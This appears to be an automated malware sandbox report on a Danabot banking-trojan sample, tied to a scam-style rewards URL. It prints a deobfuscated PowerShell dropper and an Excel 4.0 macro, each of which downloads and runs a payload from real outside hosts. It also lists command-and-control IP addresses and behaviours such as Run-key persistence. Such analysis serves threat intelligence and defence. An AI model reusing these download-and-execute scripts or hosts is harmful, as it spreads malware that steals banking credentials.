General

  • Target

    https://megascratchrewards.com/?utm_source=pop&utm_medium=111111.111111_111111

  • Sample

    250125-sxsn9azqej

Malware Config

Extracted

Language
ps1
Deobfuscated
$jrfha0 = "Wf1rHz"
$uummli = "284"
$ibtj49n = "ThMqW8s0"
$fwcajs6 = $env:userprofile + "\\" + $uummli + ".exe"
$s9gzrstm = "EFCwnlGz"
$u8uar3 = new-object net.webclient
$pljbqine = "http://blockchainjoblist.com/wp-admin/014080/", "https://womenempowermentpakistan.com/wp-admin/paba5q52/", "https://atnimanvilla.com/wp-content/073735/", "https://yeuquynhnhai.com/upload/41830/", "https://deepikarai.com/js/4bzs6/"
$l4sjlogw = "zISjEmiP"
foreach ($v3hepmmz in $pljbqine) {
    try {
        $u8uar3.downloadfile($v3hepmmz, $fwcajs6)
        $ivhhwrib = "s5Ts_iP8"
        if ((get-item $fwcajs6).length -ge 23931) {
            [diagnostics.process]::start($fwcajs6)
            $zdns8wi = "F3Wwo0"
            break
            $ttjptxb = "ijlWhCzP"
        }
    } catch {
    }
URLs
exe.dropper

http://blockchainjoblist.com/wp-admin/014080/

exe.dropper

https://womenempowermentpakistan.com/wp-admin/paba5q52/

exe.dropper

https://atnimanvilla.com/wp-content/073735/

exe.dropper

https://yeuquynhnhai.com/upload/41830/

exe.dropper

https://deepikarai.com/js/4bzs6/

Extracted

Language
xlm4.0
Source
=CALL("Kernel32", "CreateDirectoryA", "CJ", "C:\nxTgTGh", 0)
=CALL("Kernel32", "CreateDirectoryA", "CJ", "C:\nxTgTGh\ECeMdPT", 0)
=CALL("URLMON", "URLDownloadToFileA", "JCCJJ", 0, "https://erpoweredent.at/3/zte.dll", "C:\nxTgTGh\ECeMdPT\EnVYsVZ.dll", 0, 0)
=CALL("INSENG", "DownloadFile", "CCJ", "https://erpoweredent.at/3/zte.dll", "C:\nxTgTGh\ECeMdPT\EnVYsVZ.dll", 1)
=CALL("Shell32", "ShellExecuteA", "JCCCCJ", 0, "Open", "rundll32.exe", "C:\nxTgTGh\ECeMdPT\EnVYsVZ.dll,DllRegisterServer", "0", 0)
URLs
xlm40.dropper

https://erpoweredent.at/3/zte.dll

Extracted

Family

danabot

C2

51.178.195.151

51.222.39.81

149.255.35.125

38.68.50.179

51.77.7.204

rsa_pubkey.plain
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCyJo2aXOQNP+KeAnWlpOiuMk5W
l1An5GorPHqEyFAlRyv6sEylQDjAuSLGsy2LCvKmuzx2AFQ+3IMfqFf3JacY1HmY
WuiL1V+R910TohM+6hnLnWx7JNbfzB3S7D1JC/WNUwlVv5NnIIX1i+zIW5BTanU1
yQ97xjvokjvZHCHe2wIDAQAB
-----END PUBLIC KEY-----

Targets

    • Target

      https://megascratchrewards.com/?utm_source=pop&utm_medium=111111.111111_111111

    • Danabot

      Danabot is a modular banking Trojan that has been linked with other malware.

    • Danabot family

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Drops file in System32 directory

    • Probable phishing domain

MITRE ATT&CK Enterprise v15
